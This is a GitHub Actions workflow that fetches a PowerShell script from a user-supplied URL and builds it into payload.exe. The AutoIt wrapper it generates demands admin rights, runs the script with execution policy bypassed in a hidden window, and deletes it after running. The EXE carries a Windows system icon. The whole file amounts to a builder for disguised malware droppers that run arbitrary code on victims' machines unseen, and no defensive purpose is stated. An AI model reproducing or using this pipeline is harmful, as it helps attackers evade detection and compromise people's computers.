name: Convert Script to EXE (AutoIt)

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch PowerShell script'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    # Step 1: Checkout repository
    - name: Checkout code
      uses: actions/checkout@v3

    # Step 2: Install AutoIt
    - name: Install AutoIt
      shell: powershell
      run: |
        Invoke-WebRequest -Uri "https://www.autoitscript.com/autoit3/scite/download/AutoItFullInstallation.exe" -OutFile "AutoItInstaller.exe"
        Start-Process -FilePath "AutoItInstaller.exe" -ArgumentList "/S" -Wait

    # Step 3: Fetch PowerShell Payload
    - name: Fetch PowerShell Payload
      shell: powershell
      run: |
        Invoke-WebRequest -Uri '${{ github.event.inputs.payload_url }}' -OutFile 'payload.ps1'
        if (!(Test-Path "payload.ps1")) { Write-Host "Payload script missing!"; exit 1 }

    # Step 4: Create AutoIt Wrapper
    - name: Create AutoIt Script
      shell: powershell
      run: |
        Set-Content -Path "payload.au3" -Value @"
        #RequireAdmin
        $script = @TempDir & "\payload.ps1"
        FileWrite($script, '$(Get-Content -Raw payload.ps1)')
        RunWait('powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "' & $script & '"', @TempDir, @SW_HIDE)
        FileDelete($script)
        "@

    # Step 5: Compile AutoIt Script to EXE
    - name: Compile AutoIt to EXE
      shell: cmd
      run: |
        "C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2Exe.exe" /in payload.au3 /out payload.exe /icon "C:\Windows\System32\shell32.dll"

    # Step 6: Upload the EXE
    - name: Upload EXE
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: payload.exe



